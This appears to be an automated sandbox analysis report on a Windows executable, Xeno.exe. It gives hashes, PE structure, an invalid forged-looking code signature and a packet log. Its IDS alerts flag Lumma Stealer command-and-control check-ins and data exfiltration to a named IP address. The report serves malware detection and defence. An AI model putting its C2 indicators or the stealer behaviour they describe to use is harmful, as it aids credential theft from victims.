SSDEEP: 6144:CIXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uN3dwBCswSbL:nXD94QWlLZMM6YFHZ+L
MD5: D4CD3DDBF445C97CD2A9990C09CE3B22
SHA1: 59C15E25E60BDA68D6753A1635DFDBD8422F777C
SHA-256: 90C60A2101A8AEE933EC8847C9C613CA2074BD774C4744EA8991D586700F7468
SHA-512: 855EEFB80185D957B6C908AD70556F30C25422ABE04874B52040F1D3C9DDFF5057AD505C81738EBE9F2E25FC17567580C54EB0533C224988F851287AC1AFB91E
Malicious: false
Reputation: low
                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz.'f`g................................................................................................................................................................................................................................................................................................................................................0R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.634650577203108
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.96%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Xeno.exe
                          File size:455'792 bytes
                          MD5:1e5f4ee4303aa49c9c32e89132c7b4f9
                          SHA1:47a80fa40216ef35cb66dbbf45ffda5eabc803cb
                          SHA256:ae0ad87b9d4cb0599d08afc3890f98d62c7cf02405ed8aab3d5238814d90febb
                          SHA512:1bb70599944f5c5f0a69a35bbd363510536436608b0cbc76ef6eefda3c9714fac23ff514a1c8e32e4308e1914ccb26cc20d43a4defaf88015d59194b4ea71689
                          SSDEEP:12288:ZA0WUbY6uDdzIu5ijuCwTgdMXg7z0xlo2c2gNJ:K0g68I0AuaB2cTJ
                          TLSH:E0A4D0286664D93BC26E47BAF4A39101A3FAA0C7ED51E745BC9418F14D12384AF352FF
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.................0.............>.... ... ....@.. .......................@............`................................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x421a3e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Signature Valid:false
                          Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 08/10/2020 01:00:00 12/10/2023 13:00:00
                          Subject Chain
                          • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
                          Version:3
                          Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
                          Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
                          Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
                          Serial:0C9838F673F9B1CCE395CFAB2B6684E4
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x219f0 | 0x4b | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x598 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6ce00 | 0x2670 | .idata
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x219a7 | 0x1c | .text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0x1fa44 | 0x1fc00 | 7c297cc8f463f81875ed0f7ba3dd3ff0 | False | 0.4013056717519685 | data | 5.796591200875089 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x22000 | 0x598 | 0x600 | 511dd0b163083f747b4fa3f1e450067c | False | 0.41015625 | data | 4.038713703339799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x24000 | 0xc | 0x200 | b1171333753a88cda4e7356665065f4c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .idata | 0x26000 | 0x4c600 | 0x4c600 | 366e5eae475695c99103b02a700072cd | False | 1.0003388400163666 | data | 7.999481353291953 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_VERSION | 0x220a0 | 0x30c | data | | | 0.41923076923076924
                          RT_MANIFEST | 0x223ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                          2025-01-15T16:16:08.174345+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:08.699297+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:08.699297+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:09.762669+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:10.264589+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:10.264589+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:11.165133+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:24.157230+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:25.542673+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:26.775321+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:27.517223+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49748 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:28.553985+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:34.346120+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
                          2025-01-15T16:16:34.853352+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jan 15, 2025 16:16:07.644648075 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:07.644690037 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:07.644768953 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:07.647718906 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:07.647732973 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.174280882 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.174345016 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:08.180949926 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:08.180983067 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.181392908 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.230165958 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:08.281390905 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:08.281419039 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:08.281689882 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.699256897 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.699537039 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:08.699595928 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.080420971 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.080444098 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.301959991 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.302022934 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.302112103 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.302386999 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.302423954 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.762578964 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.762669086 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.763951063 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.763992071 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.764339924 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:09.765836954 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.765836954 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:09.765942097 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264607906 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264684916 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264727116 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264738083 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.264755011 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264795065 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264833927 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.264837980 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264852047 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264878988 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.264955997 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264997005 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.264997959 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.265007973 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.265316010 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.265362978 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.265371084 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.265412092 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.269345045 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.323966026 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.350435972 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350603104 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350663900 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350716114 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.350729942 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350797892 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.350805998 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350831032 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.350881100 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.351125002 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.351138115 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.351155043 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.351162910 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.484512091 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.484561920 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:10.484642029 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.485071898 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:10.485088110 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:11.165040970 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:11.165132999 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:11.166351080 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:11.166368008 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:11.166697025 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:11.176815987 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:11.176815987 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:11.176868916 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:11.180592060 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:11.180608988 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:23.658246040 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:23.658369064 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:23.658502102 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:23.658659935 CET | 49737 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:23.658679008 CET | 443 | 49737 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:23.678132057 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:23.678189993 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:23.680454969 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:23.680758953 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:23.680782080 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.157149076 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.157229900 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.159110069 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.159123898 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.159363031 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.167326927 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.167452097 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.167499065 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.978060007 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.978176117 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:24.978230000 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.978461981 CET | 49746 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:24.978485107 CET | 443 | 49746 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.067162037 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.067271948 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.067392111 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.067722082 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.067739010 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.542591095 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.542673111 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.544950962 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.544964075 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.545201063 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.546843052 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.546979904 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.547013998 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:25.547071934 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:25.547080994 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.189145088 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.189265013 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.192616940 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.192908049 CET | 49747 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.192955017 CET | 443 | 49747 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.311808109 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.311851025 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.312201023 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.312526941 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.312536955 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.775008917 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.775321007 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.777121067 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.777132034 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.777385950 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:26.778732061 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.778732061 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:26.778768063 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:27.517220974 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:27.517323017 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:27.517376900 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:27.531589985 CET | 49748 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:27.531619072 CET | 443 | 49748 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.086671114 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.086699963 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.086781025 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.087137938 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.087152958 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.553857088 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.553985119 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.555377007 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.555386066 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.555623055 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.556827068 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.557523966 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.557559967 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.557661057 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.557704926 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.557804108 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.557852983 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.557961941 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.557992935 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.558113098 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.558146000 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.558286905 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.558320045 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.558327913 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
